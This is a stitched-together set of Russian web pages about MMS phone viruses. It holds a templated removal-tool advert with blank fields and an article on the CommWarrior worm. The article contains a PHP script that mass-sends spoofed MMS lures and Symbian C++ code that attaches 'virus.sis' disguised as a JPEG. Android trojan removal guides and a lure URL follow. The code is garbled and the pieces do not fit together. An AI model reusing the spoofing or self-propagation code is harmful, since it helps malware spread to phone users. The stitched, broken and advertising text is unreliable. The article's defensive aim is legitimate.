Название угрозы

Имя исполняемого файла:

Тип угрозы:

Поражаемые ОС:

Win32 (Windows XP, Windows Vista, Windows Seven, Windows 8)

Метод заражения MMS.A

MMS.A копирует свои файл(ы) на ваш жёсткий диск. Типичное имя файла (*.*) . Потом он создаёт ключ автозагрузки в реестре с именем MMS.A и значением (*.*) . Вы также можете найти его в списке процессов с именем (*.*) или MMS.A .

Если у вас есть дополнительные вопросы касательно MMS.A, пожалуйста, заполните и мы вскоре свяжемся с вами.

Скачать утилиту для удаления

Скачайте эту программу и удалите MMS.A and (*.*) (закачка начнется автоматически):

* SpyHunter был разработан американской компанией EnigmaSoftware и способен удалить удалить MMS.A в автоматическом режиме. Программа тестировалась на Windows XP, Windows Vista, Windows 7 и Windows 8.

Функции

Программа способна защищать файлы и настройки от вредоносного кода.

Программа может исправить проблемы с браузером и защищает настройки браузера.

Удаление гарантированно - если не справился SpyHunter предоставляется бесплатная поддержка.

Антивирусная поддержка в режиме 24/7 входит в комплект поставки.

Скачайте утилиту для удаления MMS.A от российской компании Security Stronghold

Если вы не уверены какие файлы удалять, используйте нашу программу Утилиту для удаления MMS.A .. Утилита для удаления MMS.A найдет и полностью удалит MMS.A и все проблемы связанные с вирусом MMS.A. Быстрая, легкая в использовании утилита для удаления MMS.A защитит ваш компьютер от угрозы MMS.A которая вредит вашему компьютеру и нарушает вашу частную жизнь. Утилита для удаления MMS.A сканирует ваши жесткие диски и реестр и удаляет любое проявление MMS.A. Обычное антивирусное ПО бессильно против вредоносных таких программ, как MMS.A. Скачать эту упрощенное средство удаления специально разработанное для решения проблем с MMS.A и (*.*) (закачка начнется автоматически):

Функции

Удаляет все файлы, созданные MMS.A.

Удаляет все записи реестра, созданные MMS.A.

Программа может исправить проблемы с браузером.

Иммунизирует систему.

Удаление гарантированно - если Утилита не справилась предоставляется бесплатная поддержка.

Антивирусная поддержка в режиме 24/7 через систему GoToAssist входит в комплект поставки.

Наша служба поддержки готова решить вашу проблему с MMS.A и удалить MMS.A прямо сейчас!

Оставьте подробное описание вашей проблемы с MMS.A в разделе . Наша служба поддержки свяжется с вами и предоставит вам пошаговое решение проблемы с MMS.A. Пожалуйста, опишите вашу проблему как можно точнее. Это поможет нам предоставит вам наиболее эффективный метод удаления MMS.A.

Как удалить MMS.A вручную

Эта проблема может быть решена вручную, путём удаления ключей реестра и файлов связанных с MMS.A, удалением его из списка автозагрузки и де-регистрацией всех связанных DLL файлов. Кроме того, отсутствующие DLL файлы должны быть восстановлены из дистрибутива ОС если они были повреждены MMS.A .

Чтобы избавиться от MMS.A , вам необходимо:

1. Завершить следующие процессы и удалить соответствующие файлы:

Предупреждение: вам необходимо удалить только файлы, контольные суммы которых, находятся в списке вредоносных. В вашей системе могут быть нужные файлы с такими же именами. Мы рекомендуем использовать для безопасного решения проблемы.

2. Удалите следующие папки:

3. Удалите следующие ключи и\или значения ключей реестра:

Предупреждение: Если указаны значения ключей реестра, вы должны удалить только указанные значения и оставить сами ключи нетронутыми. Мы рекомендуем использовать для безопасного решения проблемы.

4. Сбросить настройки браузеров

MMS.A иногда может влиять на настройки вашего браузера, например подменять поиск и домашнюю страницу. Мы рекомендуем вам использовать бесплатную функцию "Сбросить настройки браузеров" в "Инструментах" в программе для сброса настроек всех браузеров разом. Учтите, что перед этим вам надо удалить все файлы, папки и ключи реестра принадлежащие MMS.A. Для сброса настроек браузеров вручную используйте данную инструкцию:

Для Internet Explorer

Если вы используете Windows XP, кликните Пуск , и Открыть . Введите следующее в поле Открыть без кавычек и нажмите Enter : "inetcpl.cpl".

Если вы используете Windows 7 или Windows Vista, кликните Пуск . Введите следующее в поле Искать без кавычек и нажмите Enter : "inetcpl.cpl".

Выберите вкладку Дополнительно

Под Сброс параметров браузера Internet Explorer , кликните Сброс . И нажмите Сброс ещё раз в открывшемся окне.

Выберите галочку Удалить личные настройки для удаления истории, восстановления поиска и домашней страницы.

После того как Internet Explorer завершит сброс, кликните Закрыть в диалоговом окне.

Предупреждение: Сбросить настройки браузеров в Инструменты

Для Google Chrome

Найдите папку установки Google Chrome по адресу: C:\Users\"имя пользователя"\AppData\Local\Google\Chrome\Application\User Data .

В папке User Data , найдите файл Default и переименуйте его в DefaultBackup .

Запустите Google Chrome и будет создан новый файл Default .

Настройки Google Chrome сброшены

Предупреждение: В случае если это не сработает используйте бесплатную опцию Сбросить настройки браузеров в Инструменты в программе Stronghold AntiMalware.

Для Mozilla Firefox

Откройте Firefox

В меню выберите Помощь > Информация для решения проблем .

Кликните кнопку Сбросить Firefox .

После того, как Firefox завершит, он покажет окно и создаст папку на рабочем столе. Нажмите Завершить .

Предупреждение: Так вы потеряте выши пароли! Рекомендуем использовать бесплатную опцию Сбросить настройки браузеров в Инструменты в программе Stronghold AntiMalware.

Использование популярного особенно среди молодежи MMS-сервиса таит в себе немало опасностей, о которых большинство пользователей, к сожалению, не подозревает.

В один прекрасный день вы можете получить MMS-сообщение или от вашего знакомого, или с неизвестного вам телефонного номера, или даже якобы от вашего сотового оператора. Откроете его и заразите свой телефон вирусом. В тексте зараженных MMS-сообщений может содержаться информация о том, что в приложении к нему находится бесплатная игра от вашего сотового оператора, новый рингтон от друга или архив с фотографиями от вашей дочери. Все это будет убеждать вас в необходимости скачать, установить или сохранить на карте памяти то, что было прислано в сообщении. Иногда в MMS-сообщении может находиться ссылка на какое-либо приложение или какой-то архив в Интернете.

MMS-сообщение, которое вы откроете на своем мобильном телефоне, не только может заразить ваш аппарат вирусом, но и разослать зараженные сообщения на номера телефонов из вашей записной книги.

Опаснее всего то, что когда ваш телефон будет заражен подобным образом, он сам станет атаковать абонентов мобильной связи из вашего списка контактов. То есть ваши друзья, знакомые или коллеги будут получать от вас MMS-сообщения с вирусом. В свою очередь пораженные сотовые телефоны ваших коллег начнут атаковать телефонные номера из своих адресных книг. Подобный процесс будет иметь лавинный характер и, в конечном итоге, может привести к массовым заражениям мобильных устройств.

В настоящее время подобные сценарии не очень распространены из-за того, что популярность MMS-сервисов недостаточно высока, а мобильный Интернет стоит дорого. Далеко не каждый пользователь станет закачивать себе на сотовый телефон прикрепленную программу или архив, предпочитая сделать это дома на стационарном компьютере, где это будет более экономично.

Тем не менее, в условиях падения цен на мобильный Интернет, появления безлимитных тарифов , популяризации MMS-сервиса, а также при соответствующем развитии вирусных технологий, подобные сценарии в будущем могут стать вполне реальными.

MMS (Multimedia Messaging Service) — это сервис передачи сообщений, который обеспечивает автоматическую мгновенную передачу личных мультимедийных сообщений на телефонный номер или на адрес электронной почты. Эта технология кардинально изменила набор услуг, которыми может пользоваться абонент при передаче сообщений. Однако с появлением новых возможностей появились и новые уязвимости.

Так как технология MMS позволяет передавать вместе с сообщением файл приложения, то этим механизмом тут же воспользовались вирусы для своего распространения. В данный момент уже существует подобный вирус. Он носит название CommWarrior. Вредоносная программа поражает телефоны Nokia серии 60 на базе операционной системы Symbian. примитивны и характерны для его аналогов на компьютере: вредоносный код передается на мобильное устройство в виде входящего MMS-сообщения с вложенным медиа-файлом — картинкой, аудио- или видеозаписью.

Внутри самого сообщения находится текст (всего выявлено 20 различных вариантов), который всячески побуждает абонента сотовой связи открыть вложенный файл. О том, как устроен сам вирус, будет рассказано позже, а пока рассмотрим, как злоумышленник может целенаправленно атаковать интересующий его мобильный телефон с помощью MMS. PHP-скрипт, представленный ниже, осуществляет запрос на отправку MMS-сообщения через коммерческий SMS-шлюз по протоколу http/https.

1 2 $user=»user»;
3 $password=»password»;
4 $api_id=»xxx»;
5 $text=urlencode(«Бесплатная игра от MegaPone, скачай и играй!»);
6 $to=»79035555555″;
7 $from=»MegaPone»;
8 $mms__url=»http://somesmscenter.ru/game.mms»;
9 $ret= file («http://smscenter.com/auth?user=$user&password=$password&apijd=$apijd»);
10 if ($ret ==»OK»){
11 for ($1=0; $i<100; $i++)
12 {
13 $ret= file («http://smscenter.com/sendmsg?to=$to8rtext=$text»);
414 if ($ret == «OK») echo «Success. Message was sent»;
15 }
16 }
17 else echo «Error. Message was not sent»;

Для злоумышленника передача сообщения через SMS-шлюз является предпочтительной тем, что он может указать в качестве отправителя номер, которому доверяет атакуемый, а в поле текста — сообщение, которое может побудить жертву открыть вложение. В параметре $mms_url он устанавливает адрес вредоносного содержимого, расположенного в Интернете. В параметре $from указывается номер абонента, а в поле $text — сам текст.

MMS-сообщения вируса Commwarrior содержат текст, побуждающий открыть сообщение, и файл commw.sis. Расширение прикрепленного файла SIS указывает на то, что файл является исполняемым для платформы Symbian — самой распространенной операционной системы для мобильных устройств в настоящее время.

Последняя версия вируса Commwarrior рассылает жертвам MMS со следующими сообщениями:

Заголовок: 3DNow!
Сообщение: 3DGame from me. It is FREE !

Заголовок: MatrixRemover
Сообщение: Matrix has you. Remove matrix!

Заголовок: Nokia ringtoner
Сообщение: Nokia RingtoneManager for all models.

После того, как содержащий Commwarrior SIS файл будет установлен, выполняемые файлы будут помещены в папку:

\system\apps\CommWarrior\commwarrior.exe
\system\apps\CommWarrior\commrec.mdl

При выполнении commwarrior.exe вирус копируется в папки

\system\updates\commrec.mdl
\system\updates\commwarrior.exe
\system\updates\commw.sis

После создания файла \system\updates\commw.sis вирус приступает к рассылке MMS-сообщений.

Рассмотрим некоторые детали механизма заражения с помощью MMS-сообщений. Приведенные отрывки программного «тела» вируса являются неполными из соображений безопасности, а сам разбираемый код относится лишь к отправке MMS-сообщений и никак не связан с вредоносной нагрузкой вируса.

Итак, сначала вирус создает сессию для работы с центром сообщений. Делается это с помощью следующего оператора.

iSession = CMsvSession::OpenAsyncL(*this);

Полученный идентификатор сессии используется для создания клиента, который будет обращаться к центру сообщений. Такой клиент создается следующим образом.

iMtmReg = CCIientMtmRegistry::NewL(*iSession);

Так как работа с центром сообщений ведется только для отправки MMS-сообщений, то необходимо выполнить преобразование созданного клиента в MMS-клиент.

iMmsMtm =mstatic_cast
(iMtmReg->NewMtmL (KUidMsgTypeMultimedia));

После того, как необходимая предварительная работа выполнена, вирус переходит к созданию самого MMS-сообщения. Для этого необходимо, во-первых, указать, что сообщение создается в каталоге «Черновики» мобильного телефона. Делается это следующим образом.

iMmsMtm->SwitchCurrentEntryL(KMsvDraftEntryld);

Метод SwitchCurrentEntryL, вызываемый с параметром Kmsv-DraftEntryld, показывает, что текущим местом создания как раз выбирается каталог «Drafts», то есть как раз каталог «Черновики». После того, как каталог определен, создается MMS-сообщение с параметрами «по умолчанию». Делается это с помощью следующего вызова:

iMmsMtm->CreateMessageL(iMmsMtm->DefaultServiceL())

Далее надо инициализировать основные поля сообщения MMS. Для этого с помощью макроса _LIT инициализируются основные переменные. В операционной системе Symbian макрос JLIT создает переменные. Таким образом, с его помощью определяются следующие переменные:

LIT(KSamsNumber, «07738123456»);
_LIT(KSamsAlias, «Sam»);
_LIT(KPetesNumber, «07812654321»);
_LIT(KMessageSubject, «Nokia ringtoner»);

Переменные могут носить произвольные имена. В приведенном примере в переменной KSamsNumber хранится номер атакуемого абонента, а в создаваемой переменной KSamsAlias хранится его имя, указанное в записной книжке. В переменную KPetesNumber вписывается номер отправителя, а в созданную переменную KMessageSubject записывается тема сообщения. После того как все переменные сформированы, осуществляется инициализация полей уже созданного MMS-сообщения. Делается это с помощью методов AddAddresseeL и SetSubjectL. Первому методу передается параметр EmsvRecipientTo, который определяет поле отправителя. Параметр EmsvRecipientCc инициализирует поле получателя.

iMmsMtm->AddAddresseeL(EMsvRecipientTo, KSamsNumber, KSamsAlias);
iMmsMtm->AddAddresseeL(EMsvRecipientCc, KPetesNumber);
iMmsMtm->SetSubjectL(KMessageSubject);

Для этого сначала создается переменная с именем прикрепляемого к сообщению файла. В рассматриваемом случае в MMS отправляется сам вирус. Поэтому в качестве имени файла указывается имя вирусной программы.

LIT(KFileName, «virus.sis»);

После того как переменная инициализирована, создается экземпляр класса TfileName, который описывает прикрепленное послание. С помощью метода Append созданного объекта attachmentFile инициализируются такие данные, как путь к файлу и имя самого файла.

TFileName attachmentFile(KPhoneRootPath);
attachmentFile.Append(KDirPictures);
attachmentFile. Append(KFileName);

После совершения этих действий вирус создает и описывает служебную информацию по типам прикрепленных файлов. Обычно вирус намеренно указывает неверный тип прикрепленного файла (mime-тип), например, JPG, чтобы пользователь не заподозрил атаку при передаче ему файла по MMS. Определяются mime типы с помощью следующего программного кода.

CMsvMimeHeaders* mimeHeaders = CMsvMimeHeaders::NewL();
CleanupStack::PushL(mimeHeaders);
mimeHeaders->
SetSuggestedFilenameL(KFileName);

TBufC8<10>
mimeType(KMimeType);

CMsvAttachment* attalnfo = CMsvAttachment::NewL(CMsvAttachment::EMsvFile);
CleanupStack::PushL(attalnfo);
_UT8(KMimeType, «image/jpeg»);
TBufC8<10> mimeType(KMimeType);

В приведенных выше строках описывается то, что к MMS-сообщению прикреплен только один файл. После того, как все необходимые приготовления выполнены, вызывается метод Create Attachment 2 L и MMS-сообщение создается.

iMmsMtm->CreateAttachment2L(
* store,
attachment,
mimeType,
*mimeHeaders,
attalnfo,
attachld);
CleanupStack::Pop(attalnfo);
CleanupStack::PopAndDestroy(mimeHeaders);

формирование сообщения завершается с помощью следующих программных строк.

store->CommitL();
attachment.Close();
CleanupStack::PopAndDestroy(attachment);
CleanupStack::PopAndDestroy(store);

Само сообщение сохраняется после полной подготовки с помощью метода SaveMessageL().

iMmsMtm->SaveMessageL();

Наконец отправка сообщения осуществляется следующим образом.

Таким образом, вирус является самораспространяющимся. Описывать, как реализуется вредоносная часть вируса, которая пересылает ваши персональные данные с телефона, мы не будем по понятным причинам. Наша цель — предупредить пользователя о существующей опасности, а не научить злоумышленника создавать вирусы.

ЗАЩИТА ОТ АТАКИ

Для того чтобы обезопасить свой сотовый телефон, необходимо быть крайне аккуратным при получении MMS-сообщения. Помните, что прикрепленное к сообщению вложение вполне может оказаться вирусом. Именно поэтому далеко не всегда стоит принимать MMS-сообщения от незнакомых абонентов. Если же сообщение представляет для вас интерес, то стоит обязательно просканировать приложение антивирусным средством на предмет наличия вирусов.

Если вирус все же попал на ваше мобильное устройство, то возможность безболезненно от него избавиться все же существует. Вы можете лично удалить вредоносный файл, если знаете, где его найти. В случае, если вас атаковал неизвестный вирус, то придется потратить много времени, чтобы его обнаружить. При этом необходимо быть аккуратным, чтобы случайно не удалить системные файлы.

Для того чтобы самостоятельно удалить вирус Commwarrior, необходим менеджер файлов с возможностью просмотра системных каталогов. С помощью этого менеджера можно удалить из памяти мобильного телефона вирусную папку \system\apps\commwarrior, с находящимися в ней специальными файлами вируса commwarrior.exe и commrec. mdl. В каталоге \system\updates\commwarrior необходимо удалить ключевые вирусные файлы commwarrior.exe, commrec.mdl и commw.sis. В каталоге \system\recogs удалению подлежит файл commrec.mdl.

Очень многие пользователи подхватили на своих Андроид устройствах вирус-приложение SMS/MMS New, которое вызывает неизвестные уведомления, может отправлять платные сообщения, отслеживать личные данные и звонки. Помимо всего этого некоторые пользователи получают сообщение о сбое стандартной опции – “В приложении SMS/MMS произошла ошибка” . В нашей небольшой статье мы собрали все самые полезные и действенные решения, которые помогут удалить этот вирус из телефона.

Вирусные СМС сообщения

Как удаляются вирусы

Вирусы, ориентированные на захват функции отправки сообщений в Андроиде, распространяются уже давно. Так, до сих пор через данные с Авито распространяется зловред ММС-центр . Удаляется такой вирус через запуск безопасного режима в телефоне, после проходите в Настройки – функция Безопасность – опция Администрирование – Администраторы устройств, где снимается галочка с программы. После следует стандартное удаление через Диспетчер.

Сейчас же активничает троянское приложение SMS/MMS New . Источников распространения очень много, в основном это популярный софт и рассылка сообщений (со ссылками типа http://mms-new.ru/id169). Удаляется этот троян подобно ММС-центру:

1. Следует в безопасном режиме выполнить вышеописанные действия и проверить в Администраторы устройств вирус New и если есть снять галочку.
2. После запустите сканирование мобильным антивирусом Dr.Web Light . Применить можно и другие сканеры, но я рекомендую именно доктора – базы уж очень актуальные у него.
3. Далее удалите все предустановленные программы и загрузки. Также сделайте сброс стандартных настроек приложений СМС/ММС в телефоне.

В приложении SMS/MMS произошла ошибка – как исправить

Такие вирусы после себя могут оставить сбой в системном приложении. Чаще всего такой сбой вызван сбитыми настройками. После попытки отправить сообщение, пользователи получают уведомление, что в приложении смс/ммс произошла ошибка.

Данный сбой может возникать и не по вине вирусов, а после определенных апдейтов, либо вследствие кривых прошивок. В любом случае, решения должны помочь.

ММС-центр в пакетах мобильного оператора Билайн необходим для отправки и получения контента (фото, видео, картинок, документов) на телефоне посредством предоставляемой сотовой связи. Однако в последнее время на андроид-устройствах участились случаи заражения вирусом, который выдаёт себя за доверенную службу ММС. Многие пользователи, не подозревая присутствие такой «маскировки», задаются вопросом, как удалить MMS-центр Билайн. Но на самом деле перед ними стоит задача куда более серьёзней - им нужно удалить вирус.

Эта статья поможет вам разобраться с ММС-службой на телефоне: вы узнаете, как функционирует доверенный сервис и замаскированный вирус.

Настоящий MMS-центр

Как уже и говорилось в начале статьи, данная служба занимается отправкой данных через коммуникационные каналы оператора. В этом формате (ММС) можно пересылать файлы объёмом до 500 кб, а также текстовые послания размером не больше 1000 знаков. Отправка контента возможна как внутри сети оператора, так и в сети других компаний. В том числе, в режиме роуминга (за пределами территории России).

Чтобы воспользоваться услугой MMS, её необходимо активировать:

1. Перед тем как приступить к активации, убедитесь в том, что ваше мобильное устройство поддерживает работу с медиаконтентом (просмотр картинок, видео и т.д.).

2. Отправьте USSD-запрос на подключение - *110*181#.

Примечание. Билайн после отправки этой команды предоставляет вместе с MMS также и мобильный GPRS.

3. Закажите автоматическую настройку MMS в вашем телефоне при помощи сервисной службы 0880.

Примечание. Также вы можете ознакомиться с настройкой по номеру 060432 (пункт «Настройки»).

4. Перезагрузите телефон для завершения его регистрации в сервисе ММС.

Осторожно: MMS-центр - вирус!

Чтобы убрать это вирусное приложение, выполните следующие действия:
1. Перезапустите мобильное устройство в безопасном режиме. Если вы не знаете, как выполняется эта процедура, найдите в интернете руководство по её выполнению именно для вашей модели телефона.

Что происходит?

Хитрый вирус поражает смартфоны тех, кто кликнет по ссылке из сообщения. Соблазн велик: сообщение приходят от кого-то из вашего списка контактов.

Выглядят они так:

В случае перехода по указанному адресу на смартфон жертвы загружается программа с расширением. apk.

Читайте больше на https://www.pravda.ru/news/science/technolgies/06−07−2017/1340883-mms-0/

Мало того, если вы откроете ссылку, в ваш телефон загружается программа (чаще всего с расширением apk). Кроме финансовых потерь вирусная программа страшна тем, что ваш телефон также начинает рассылать подобные sms и mms вашим контактам из списка. Саму же программу просто так не удалишь: она блокирует баннером доступ к списку приложений и к настройкам вашего смартфона.

Этой программе уже больше года, сейчас пошла очередная волна рассылок.

что делать, если прИшло сообщение

Упс, я нажал...

Можно сразу отнести телефон специалистам либо попробовать убрать «захватчика» самому.

Вытащите sim-карту из устройства и загрузите устройство в «Безопасном режиме»: когда на смартфоне работают только предустановленные «заводские» приложения. Тогда вы сможете войти в меню и удалить «захватчика».

Безопасный режим включается на разных смартфонах по-разному.

Нажмите и удерживайте кнопку питания до тех пор, пока не появится меню выключения.

Выберите пункт «Выключить» или «Отключить питание» и удерживайте на нем палец до появления вот такого меню:

Нажмите ОК и дождитесь перезагрузки. Когда устройство включится, в левом углу появится надпись «Безопасный режим».

На некоторых смартфонах после нажатия кнопки «Выключить» нужно долго держать кнопку уменьшения громкости, тогда «Безопасный режим» включится.

Лучше заранее «погуглить», как он включается на устройстве вашей модели.

После этого нужно найти и удалить опасное приложение. Обычно он называется SMS_S, SMS MMS, Послание, Сообщение, SMS Фото, MMS Фото, Foto или похожим образом.

Не нашли? Попробуйте удалять по одному все недавно установленные приложения. Нужные вы потом всегда сможете установить снова.

Перезагрузите устройство. Проверьте его на вирусы с помощью встроенного или загруженного антивируса. Если справиться с вирусом не получается, обратитесь к специалистам.